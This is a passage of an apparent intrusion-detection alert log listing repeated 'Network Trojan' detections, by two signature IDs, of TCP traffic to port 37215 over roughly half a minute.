          SID:2829579
          Source Port:37708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.944537
          SID:2835222
          Source Port:58788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.029597
          SID:2835222
          Source Port:45932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.074426
          SID:2829579
          Source Port:45256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.687491
          SID:2835222
          Source Port:50472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.119890
          SID:2829579
          Source Port:44224
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929759
          SID:2829579
          Source Port:45316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.225538
          SID:2835222
          Source Port:38818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.248904
          SID:2835222
          Source Port:45024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.225466
          SID:2829579
          Source Port:58052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.643241
          SID:2829579
          Source Port:49160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.166548
          SID:2829579
          Source Port:59496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.292374
          SID:2835222
          Source Port:47096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.079084
          SID:2835222
          Source Port:58310
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.996472
          SID:2835222
          Source Port:38476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.164503
          SID:2829579
          Source Port:58098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.468893
          SID:2829579
          Source Port:50858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.247135
          SID:2829579
          Source Port:60082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.556771
          SID:2835222
          Source Port:53010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820618
          SID:2835222
          Source Port:44770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.302251
          SID:2829579
          Source Port:54066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.400005
          SID:2829579
          Source Port:33038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.721355
          SID:2829579
          Source Port:42770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.471525
          SID:2835222
          Source Port:56048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.890643
          SID:2835222
          Source Port:32946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.917062
          SID:2835222
          Source Port:51608
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.226460
          SID:2835222
          Source Port:57404
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.285612
          SID:2835222
          Source Port:45582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720021
          SID:2835222
          Source Port:47000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.288913
          SID:2829579
          Source Port:36114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.559601
          SID:2835222
          Source Port:51852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.163414
          SID:2835222
          Source Port:45380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.718394
          SID:2829579
          Source Port:53262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.103511
          SID:2835222
          Source Port:45866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.036067
          SID:2829579
          Source Port:55352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.643294
          SID:2835222
          Source Port:37552
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720682
          SID:2829579
          Source Port:46916
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948304
          SID:2829579
          Source Port:36144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.088349
          SID:2835222
          Source Port:54790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644445
          SID:2829579
          Source Port:37590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.643370
          SID:2835222
          Source Port:59904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.987991
          SID:2835222
          Source Port:36544
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929755
          SID:2835222
          Source Port:60168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.283668
          SID:2835222
          Source Port:53234
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.862685
          SID:2829579
          Source Port:34682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.081578
          SID:2835222
          Source Port:41436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.097492
          SID:2835222
          Source Port:46408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.909753
          SID:2835222
          Source Port:37018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.077115
          SID:2829579
          Source Port:58980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.033465
          SID:2835222
          Source Port:36224
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.248289
          SID:2829579
          Source Port:42706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.120639
          SID:2829579
          Source Port:48898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.128945
          SID:2829579
          Source Port:50346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.158122
          SID:2835222
          Source Port:54892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.284525
          SID:2829579
          Source Port:57082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.922255
          SID:2829579
          Source Port:39838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.568002
          SID:2829579
          Source Port:54542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.918263
          SID:2835222
          Source Port:59274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.413022
          SID:2835222
          Source Port:35106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.168780
          SID:2829579
          Source Port:36836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.163953
          SID:2835222
          Source Port:53804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719067
          SID:2835222
          Source Port:33864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.092055
          SID:2835222
          Source Port:58330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.160488
          SID:2829579
          Source Port:34054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.241913
          SID:2835222
          Source Port:42094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.289212
          SID:2835222
          Source Port:42934
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.823282
          SID:2835222
          Source Port:58540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.167571
          SID:2835222
          Source Port:54182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645501
          SID:2835222
          Source Port:38692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.284281
          SID:2829579
          Source Port:36042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.288660
          SID:2829579
          Source Port:53370
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.288195
          SID:2835222
          Source Port:50386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.865070
          SID:2835222
          Source Port:53252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.658692
          SID:2835222
          Source Port:40896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.916627
          SID:2835222
          Source Port:35024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946681
          SID:2829579
          Source Port:56254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.599151
          SID:2835222
          Source Port:40672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.294502
          SID:2829579
          Source Port:60894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719928
          SID:2829579
          Source Port:56964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.987936
          SID:2829579
          Source Port:40800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.571597
          SID:2829579
          Source Port:45866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.164136
          SID:2835222
          Source Port:40418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.250512
          SID:2835222
          Source Port:48416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:46.417608
          SID:2835222
          Source Port:46648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.596380
          SID:2829579
          Source Port:46252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398431
          SID:2835222
          Source Port:49132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.987363
          SID:2829579
          Source Port:43648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.862759
          SID:2829579
          Source Port:59690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645481
          SID:2829579
          Source Port:42986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.418768
          SID:2835222
          Source Port:56884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.917124
          SID:2829579
          Source Port:46192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.291289
          SID:2829579
          Source Port:36988
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.207506
          SID:2829579
          Source Port:57014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.646013
          SID:2835222
          Source Port:58736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.636212
          SID:2829579
          Source Port:40206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.035687
          SID:2829579
          Source Port:40226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.164014
          SID:2829579
          Source Port:57610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.249510
          SID:2835222
          Source Port:56046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.557490
          SID:2829579
          Source Port:57934
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.034219
          SID:2835222
          Source Port:41870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.245393
          SID:2835222
          Source Port:45572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.284957
          SID:2829579
          Source Port:57500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.863205
          SID:2835222
          Source Port:38988
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.286582
          SID:2835222
          Source Port:55820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.949694
          SID:2835222
          Source Port:41402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.566487
          SID:2829579
          Source Port:45642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.032547
          SID:2829579
          Source Port:45954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.209050
          SID:2829579
          Source Port:43168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.076653
          SID:2829579
          Source Port:47190
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.034774
          SID:2835222
          Source Port:35642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.033209
          SID:2835222
          Source Port:55800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820403
          SID:2835222
          Source Port:48946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.717935
          SID:2835222
          Source Port:58758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.102603
          SID:2829579
          Source Port:35724
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.865945
          SID:2829579
          Source Port:45120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.306641
          SID:2835222
          Source Port:46656
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.156013
          SID:2829579
          Source Port:37002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645101
          SID:2835222
          Source Port:56318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.034260
          SID:2835222
          Source Port:43150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.990259
          SID:2829579
          Source Port:50332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.163995
          SID:2829579
          Source Port:48180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.926795
          SID:2829579
          Source Port:56820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946032
          SID:2829579
          Source Port:41466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.286795
          SID:2829579
          Source Port:57206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396859
          SID:2835222
          Source Port:36154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.224663
          SID:2835222
          Source Port:33762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.230693
          SID:2829579
          Source Port:39976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.293947
          SID:2835222
          Source Port:59510
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.887805
          SID:2835222
          Source Port:39604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.692079
          SID:2835222
          Source Port:47470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.165835
          SID:2829579
          Source Port:60486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.563529
          SID:2835222
          Source Port:43668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.225501
          SID:2835222
          Source Port:33884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.540316
          SID:2835222
          Source Port:47992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.167359
          SID:2835222
          Source Port:48064
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820443
          SID:2835222
          Source Port:33446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.471811
          SID:2829579
          Source Port:37998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947855
          SID:2829579
          Source Port:32816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.994746
          SID:2835222
          Source Port:56448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.282329
          SID:2829579
          Source Port:45980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.035957
          SID:2835222
          Source Port:37752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948653
          SID:2829579
          Source Port:55960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.677295
          SID:2829579
          Source Port:51038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.080120
          SID:2835222
          Source Port:60410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539110
          SID:2829579
          Source Port:47130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.036899
          SID:2835222
          Source Port:42516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206694
          SID:2829579
          Source Port:50294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720241
          SID:2829579
          Source Port:44434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.596991
          SID:2829579
          Source Port:35220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821186
          SID:2829579
          Source Port:41426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.163918
          SID:2835222
          Source Port:35280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.414214
          SID:2829579
          Source Port:49540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.643714
          SID:2835222
          Source Port:46588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.248327
          SID:2829579
          Source Port:56168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.718735
          SID:2835222
          Source Port:60986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.608066
          SID:2829579
          Source Port:48448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.081608
          SID:2829579
          Source Port:59312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.010091
          SID:2829579
          Source Port:51016
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.478826
          SID:2829579
          Source Port:46638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.860453
          SID:2835222
          Source Port:47362
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945738
          SID:2835222
          Source Port:48322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.102447
          SID:2829579
          Source Port:35058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.688163
          SID:2835222
          Source Port:44826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.273680
          SID:2829579
          Source Port:47404
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.465489
          SID:2829579
          Source Port:44128
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.413650
          SID:2829579
          Source Port:50670
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.560491
          SID:2835222
          Source Port:55472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928462
          SID:2829579
          Source Port:56458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.465547
          SID:2829579
          Source Port:48674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821170
          SID:2835222
          Source Port:51546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.102612
          SID:2829579
          Source Port:56798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.129681
          SID:2829579
          Source Port:38580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.004582
          SID:2835222
          Source Port:47028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.289734
          SID:2829579
          Source Port:50516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.241954
          SID:2835222
          Source Port:47192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.412873
          SID:2829579
          Source Port:47818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397886
          SID:2829579
          Source Port:46366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947975
          SID:2835222
          Source Port:52480
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.078269
          SID:2835222
          Source Port:35730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.164299
          SID:2829579
          Source Port:47128
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.953118
          SID:2829579
          Source Port:37488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.030429
          SID:2829579
          Source Port:47958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.088845
          SID:2829579
          Source Port:49982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.996193
          SID:2829579
          Source Port:35296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.864561
          SID:2835222
          Source Port:38566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.477966
          SID:2829579
          Source Port:44754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.418214
          SID:2835222
          Source Port:45392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.412006
          SID:2829579
          Source Port:55640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.160933
          SID:2829579
          Source Port:50802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.081654
          SID:2835222
          Source Port:38932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.893121
          SID:2829579
          Source Port:50838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.078852
          SID:2835222
          Source Port:47066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.035071
          SID:2835222
          Source Port:42060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719351
          SID:2835222
          Source Port:44394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.541514
          SID:2829579
          Source Port:50012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.067270
          SID:2829579
          Source Port:36678
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398363
          SID:2835222
          Source Port:56846
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.471953
          SID:2835222
          Source Port:39442
          Destination Port:37215
